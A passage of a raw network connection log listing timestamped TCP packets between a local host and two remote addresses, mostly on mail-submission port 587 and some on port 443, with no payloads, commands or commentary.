Nov 13, 2024 16:28:20.916337967 CET	587	49708	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:21.152215958 CET	587	49708	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:21.152867079 CET	49708	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:21.152867079 CET	49708	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:21.152906895 CET	49708	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:21.152906895 CET	49708	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:21.157891035 CET	587	49708	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:21.157900095 CET	587	49708	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:21.157907009 CET	587	49708	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:21.158166885 CET	587	49708	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:21.395066977 CET	587	49708	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:21.435800076 CET	49708	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:21.464858055 CET	49708	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:21.469763041 CET	587	49708	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:21.705976009 CET	587	49708	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:21.708187103 CET	49708	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:21.708380938 CET	49731	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:21.713427067 CET	587	49731	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:21.713502884 CET	49731	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:22.621243000 CET	587	49731	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:22.621380091 CET	49731	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:22.626434088 CET	587	49731	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:22.869749069 CET	587	49731	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:22.869888067 CET	49731	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:22.874984026 CET	587	49731	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:23.119683027 CET	587	49731	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:23.120063066 CET	49731	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:23.125179052 CET	587	49731	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:23.374891043 CET	587	49731	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:23.374912977 CET	587	49731	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:23.374923944 CET	587	49731	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:23.374953985 CET	587	49731	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:23.374984980 CET	49731	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:23.375021935 CET	49731	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:23.376322985 CET	49731	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:23.381752014 CET	587	49731	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:23.625180960 CET	587	49731	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:23.628289938 CET	49731	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:23.633178949 CET	587	49731	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:23.877538919 CET	587	49731	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:23.881844997 CET	49731	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:23.887912035 CET	587	49731	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:24.131166935 CET	587	49731	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:24.131475925 CET	49731	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:24.138406992 CET	587	49731	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:24.382945061 CET	587	49731	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:24.383318901 CET	49731	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:24.388484001 CET	587	49731	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:24.631546974 CET	587	49731	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:24.631907940 CET	49731	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:24.636934042 CET	587	49731	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:24.885030031 CET	587	49731	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:24.889384985 CET	49731	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:25.130582094 CET	587	49731	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:25.130683899 CET	49731	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:25.131083965 CET	587	49731	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:25.374125957 CET	587	49731	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:25.375591993 CET	49731	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:25.375683069 CET	49731	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:25.375770092 CET	49731	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:25.375804901 CET	49731	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:25.375850916 CET	49731	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:25.375905037 CET	49731	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:25.375946999 CET	49731	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:25.375973940 CET	49731	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:25.375997066 CET	49731	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:25.376070976 CET	49731	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:25.380467892 CET	587	49731	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:25.380503893 CET	587	49731	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:25.380537033 CET	587	49731	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:25.380728006 CET	587	49731	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:25.380775928 CET	587	49731	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:25.380832911 CET	587	49731	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:25.380907059 CET	587	49731	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:25.380958080 CET	587	49731	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:25.380968094 CET	587	49731	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:25.381089926 CET	587	49731	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:25.627437115 CET	587	49731	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:25.725379944 CET	49731	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:26.043303967 CET	49755	443	192.168.2.5	104.26.12.205
Nov 13, 2024 16:28:26.043354034 CET	443	49755	104.26.12.205	192.168.2.5
Nov 13, 2024 16:28:26.043423891 CET	49755	443	192.168.2.5	104.26.12.205
Nov 13, 2024 16:28:26.046968937 CET	49755	443	192.168.2.5	104.26.12.205
Nov 13, 2024 16:28:26.046984911 CET	443	49755	104.26.12.205	192.168.2.5
Nov 13, 2024 16:28:26.650361061 CET	443	49755	104.26.12.205	192.168.2.5
Nov 13, 2024 16:28:26.651094913 CET	49755	443	192.168.2.5	104.26.12.205
Nov 13, 2024 16:28:26.652940035 CET	49755	443	192.168.2.5	104.26.12.205
Nov 13, 2024 16:28:26.652945995 CET	443	49755	104.26.12.205	192.168.2.5
Nov 13, 2024 16:28:26.653266907 CET	443	49755	104.26.12.205	192.168.2.5
Nov 13, 2024 16:28:26.705028057 CET	49755	443	192.168.2.5	104.26.12.205
Nov 13, 2024 16:28:26.747325897 CET	443	49755	104.26.12.205	192.168.2.5
Nov 13, 2024 16:28:26.879621983 CET	443	49755	104.26.12.205	192.168.2.5
Nov 13, 2024 16:28:26.879776001 CET	443	49755	104.26.12.205	192.168.2.5
Nov 13, 2024 16:28:26.879849911 CET	49755	443	192.168.2.5	104.26.12.205
Nov 13, 2024 16:28:26.924038887 CET	49755	443	192.168.2.5	104.26.12.205
Nov 13, 2024 16:28:28.503340006 CET	49767	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:28.508330107 CET	587	49767	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:28.509407997 CET	49767	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:29.391102076 CET	587	49767	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:29.391350985 CET	49767	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:29.396362066 CET	587	49767	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:29.630789995 CET	587	49767	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:29.630927086 CET	49767	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:29.635876894 CET	587	49767	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:29.871548891 CET	587	49767	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:29.872528076 CET	49767	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:29.877855062 CET	587	49767	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:30.117970943 CET	587	49767	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:30.118220091 CET	587	49767	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:30.118361950 CET	587	49767	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:30.118366003 CET	49767	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:30.118973017 CET	587	49767	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:30.119038105 CET	49767	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:30.130527973 CET	49767	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:30.135473967 CET	587	49767	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:30.369695902 CET	587	49767	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:30.373507977 CET	49767	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:30.378407955 CET	587	49767	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:30.612688065 CET	587	49767	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:30.613006115 CET	49767	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:30.618391991 CET	587	49767	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:30.853045940 CET	49731	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:30.854002953 CET	587	49767	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:30.854376078 CET	49767	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:30.860204935 CET	587	49767	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:31.097559929 CET	587	49767	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:31.098684072 CET	49767	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:31.103710890 CET	587	49767	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:31.338274002 CET	587	49767	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:31.339237928 CET	49767	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:31.344146967 CET	587	49767	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:31.583451033 CET	587	49767	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:31.585026979 CET	49767	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:31.589889050 CET	587	49767	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:31.824131012 CET	587	49767	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:31.826018095 CET	49767	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:31.826019049 CET	49767	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:31.826061964 CET	49767	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:31.826061964 CET	49767	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:31.830846071 CET	587	49767	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:31.830910921 CET	587	49767	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:31.831079006 CET	587	49767	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:31.831088066 CET	587	49767	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:32.067162037 CET	587	49767	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:32.223212004 CET	49767	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:33.423940897 CET	49767	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:33.428972960 CET	587	49767	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:33.663429976 CET	587	49767	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:33.663784981 CET	49767	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:33.664869070 CET	49786	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:33.669833899 CET	587	49786	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:33.669981956 CET	49786	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:34.571944952 CET	587	49786	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:34.714695930 CET	49791	443	192.168.2.5	104.26.12.205
Nov 13, 2024 16:28:34.714745998 CET	443	49791	104.26.12.205	192.168.2.5
Nov 13, 2024 16:28:34.715078115 CET	49791	443	192.168.2.5	104.26.12.205
Nov 13, 2024 16:28:34.719856024 CET	49791	443	192.168.2.5	104.26.12.205
Nov 13, 2024 16:28:34.719882011 CET	443	49791	104.26.12.205	192.168.2.5
Nov 13, 2024 16:28:34.792167902 CET	49786	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:34.978404045 CET	587	49786	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:34.978473902 CET	49786	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:35.675409079 CET	443	49791	104.26.12.205	192.168.2.5
Nov 13, 2024 16:28:35.675554991 CET	49791	443	192.168.2.5	104.26.12.205
Nov 13, 2024 16:28:35.706084967 CET	49791	443	192.168.2.5	104.26.12.205
Nov 13, 2024 16:28:35.706103086 CET	443	49791	104.26.12.205	192.168.2.5
Nov 13, 2024 16:28:35.706952095 CET	443	49791	104.26.12.205	192.168.2.5
Nov 13, 2024 16:28:35.911335945 CET	443	49791	104.26.12.205	192.168.2.5
Nov 13, 2024 16:28:35.911385059 CET	49791	443	192.168.2.5	104.26.12.205
Nov 13, 2024 16:28:35.960109949 CET	49791	443	192.168.2.5	104.26.12.205
Nov 13, 2024 16:28:36.003330946 CET	443	49791	104.26.12.205	192.168.2.5
Nov 13, 2024 16:28:36.228467941 CET	443	49791	104.26.12.205	192.168.2.5
Nov 13, 2024 16:28:36.228519917 CET	443	49791	104.26.12.205	192.168.2.5
Nov 13, 2024 16:28:36.228631973 CET	49791	443	192.168.2.5	104.26.12.205
Nov 13, 2024 16:28:36.230983019 CET	49791	443	192.168.2.5	104.26.12.205
Nov 13, 2024 16:28:37.038439989 CET	49802	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:37.043505907 CET	587	49802	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:37.043597937 CET	49802	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:37.976600885 CET	587	49802	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:37.976844072 CET	49802	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:37.981705904 CET	587	49802	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:38.221750021 CET	587	49802	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:38.251254082 CET	49802	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:38.256136894 CET	587	49802	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:38.495523930 CET	587	49802	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:38.495913982 CET	49802	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:38.500788927 CET	587	49802	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:38.745692968 CET	587	49802	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:38.745950937 CET	587	49802	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:38.745966911 CET	587	49802	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:38.746000051 CET	49802	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:38.746613979 CET	587	49802	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:38.746665955 CET	49802	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:38.747559071 CET	49802	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:38.752506018 CET	587	49802	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:38.994188070 CET	587	49802	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:38.997833967 CET	49802	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:39.002679110 CET	587	49802	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:39.241784096 CET	587	49802	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:39.242106915 CET	49802	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:39.247396946 CET	587	49802	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:39.486938953 CET	587	49802	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:39.487183094 CET	49802	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:39.492088079 CET	587	49802	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:39.610332966 CET	49786	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:39.742460012 CET	587	49802	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:39.742711067 CET	49802	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:39.747673988 CET	587	49802	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:39.986917973 CET	587	49802	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:39.987226963 CET	49802	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:39.992404938 CET	587	49802	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:40.235466003 CET	587	49802	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:40.235735893 CET	49802	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:40.240628958 CET	587	49802	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:40.479517937 CET	587	49802	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:40.480108023 CET	49802	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:40.480159044 CET	49802	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:40.480216980 CET	49802	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:40.480216980 CET	49802	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:40.485008001 CET	587	49802	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:40.485142946 CET	587	49802	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:40.485172987 CET	587	49802	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:40.485224009 CET	587	49802	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:40.726712942 CET	587	49802	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:40.789367914 CET	49802	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:40.844367981 CET	49802	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:40.849478006 CET	587	49802	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:41.089133978 CET	587	49802	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:41.090194941 CET	49802	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:41.090878963 CET	49823	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:41.095886946 CET	587	49823	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:41.096860886 CET	49823	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:41.982292891 CET	587	49823	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:41.982430935 CET	49823	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:41.987308025 CET	587	49823	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:42.223768950 CET	587	49823	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:42.223901987 CET	49823	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:42.229314089 CET	587	49823	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:42.465934992 CET	587	49823	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:42.466274977 CET	49823	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:42.471302986 CET	587	49823	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:42.717206001 CET	587	49823	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:42.717403889 CET	587	49823	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:42.717416048 CET	587	49823	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:42.717483997 CET	49823	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:42.717644930 CET	587	49823	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:42.717681885 CET	49823	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:42.720093966 CET	49823	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:42.725018978 CET	587	49823	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:42.986294031 CET	587	49823	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:42.987324953 CET	49823	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:42.993484974 CET	587	49823	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:43.233998060 CET	587	49823	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:43.234376907 CET	49823	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:43.240417004 CET	587	49823	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:43.477598906 CET	587	49823	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:43.484078884 CET	49823	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:43.489125967 CET	587	49823	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:43.860726118 CET	587	49823	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:43.860924006 CET	49823	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:43.865890980 CET	587	49823	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:44.101809978 CET	587	49823	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:44.102029085 CET	49823	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:44.108175993 CET	587	49823	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:44.364859104 CET	587	49823	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:44.365047932 CET	49823	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:44.371007919 CET	587	49823	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:44.611453056 CET	587	49823	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:44.612013102 CET	49823	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:44.612091064 CET	49823	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:44.612135887 CET	49823	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:44.612189054 CET	49823	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:44.612250090 CET	49823	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:44.612297058 CET	49823	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:44.612346888 CET	49823	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:44.612386942 CET	49823	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:44.612420082 CET	49823	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:44.612953901 CET	49823	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:28:44.616772890 CET	587	49823	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:44.616871119 CET	587	49823	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:44.616880894 CET	587	49823	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:44.617057085 CET	587	49823	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:44.617218018 CET	587	49823	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:44.617342949 CET	587	49823	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:44.617352009 CET	587	49823	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:44.617360115 CET	587	49823	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:44.617372990 CET	587	49823	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:44.617763996 CET	587	49823	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:44.856808901 CET	587	49823	51.195.88.199	192.168.2.5
Nov 13, 2024 16:28:44.905344009 CET	49823	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:30:17.077251911 CET	49823	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:30:17.128658056 CET	587	49823	51.195.88.199	192.168.2.5
Nov 13, 2024 16:30:17.371140957 CET	587	49823	51.195.88.199	192.168.2.5
Nov 13, 2024 16:30:17.371644974 CET	49823	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:30:24.612911940 CET	49988	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:30:24.618004084 CET	587	49988	51.195.88.199	192.168.2.5
Nov 13, 2024 16:30:24.619585037 CET	49988	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:30:25.439933062 CET	587	49988	51.195.88.199	192.168.2.5
Nov 13, 2024 16:30:25.440191984 CET	49988	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:30:25.445141077 CET	587	49988	51.195.88.199	192.168.2.5
Nov 13, 2024 16:30:25.679569960 CET	587	49988	51.195.88.199	192.168.2.5
Nov 13, 2024 16:30:25.679738998 CET	49988	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:30:25.685190916 CET	587	49988	51.195.88.199	192.168.2.5
Nov 13, 2024 16:30:25.920582056 CET	587	49988	51.195.88.199	192.168.2.5
Nov 13, 2024 16:30:25.920986891 CET	49988	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:30:25.926966906 CET	587	49988	51.195.88.199	192.168.2.5
Nov 13, 2024 16:30:26.166130066 CET	587	49988	51.195.88.199	192.168.2.5
Nov 13, 2024 16:30:26.166241884 CET	587	49988	51.195.88.199	192.168.2.5
Nov 13, 2024 16:30:26.166256905 CET	587	49988	51.195.88.199	192.168.2.5
Nov 13, 2024 16:30:26.166322947 CET	49988	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:30:26.166526079 CET	587	49988	51.195.88.199	192.168.2.5
Nov 13, 2024 16:30:26.166594028 CET	49988	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:30:26.166765928 CET	587	49988	51.195.88.199	192.168.2.5
Nov 13, 2024 16:30:26.168740034 CET	49988	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:30:26.173630953 CET	587	49988	51.195.88.199	192.168.2.5
Nov 13, 2024 16:30:26.407661915 CET	587	49988	51.195.88.199	192.168.2.5
Nov 13, 2024 16:30:26.408507109 CET	49988	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:30:26.413611889 CET	587	49988	51.195.88.199	192.168.2.5
Nov 13, 2024 16:30:26.651961088 CET	587	49988	51.195.88.199	192.168.2.5
Nov 13, 2024 16:30:26.652189016 CET	49988	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:30:26.657010078 CET	587	49988	51.195.88.199	192.168.2.5
Nov 13, 2024 16:30:26.891685009 CET	587	49988	51.195.88.199	192.168.2.5
Nov 13, 2024 16:30:26.891928911 CET	49988	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:30:26.896852970 CET	587	49988	51.195.88.199	192.168.2.5
Nov 13, 2024 16:30:27.144794941 CET	587	49988	51.195.88.199	192.168.2.5
Nov 13, 2024 16:30:27.145006895 CET	49988	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:30:27.150011063 CET	587	49988	51.195.88.199	192.168.2.5
Nov 13, 2024 16:30:27.384727955 CET	587	49988	51.195.88.199	192.168.2.5
Nov 13, 2024 16:30:27.385035038 CET	49988	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:30:27.389996052 CET	587	49988	51.195.88.199	192.168.2.5
Nov 13, 2024 16:30:27.632941008 CET	587	49988	51.195.88.199	192.168.2.5
Nov 13, 2024 16:30:27.633194923 CET	49988	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:30:27.638587952 CET	587	49988	51.195.88.199	192.168.2.5
Nov 13, 2024 16:30:27.872977972 CET	587	49988	51.195.88.199	192.168.2.5
Nov 13, 2024 16:30:27.873459101 CET	49988	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:30:27.873598099 CET	49988	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:30:27.873598099 CET	49988	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:30:27.873694897 CET	49988	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:30:27.875500917 CET	49988	587	192.168.2.5	51.195.88.199
Nov 13, 2024 16:30:27.878581047 CET	587	49988	51.195.88.199	192.168.2.5
Nov 13, 2024 16:30:27.878612041 CET	587	49988	51.195.88.199	192.168.2.5
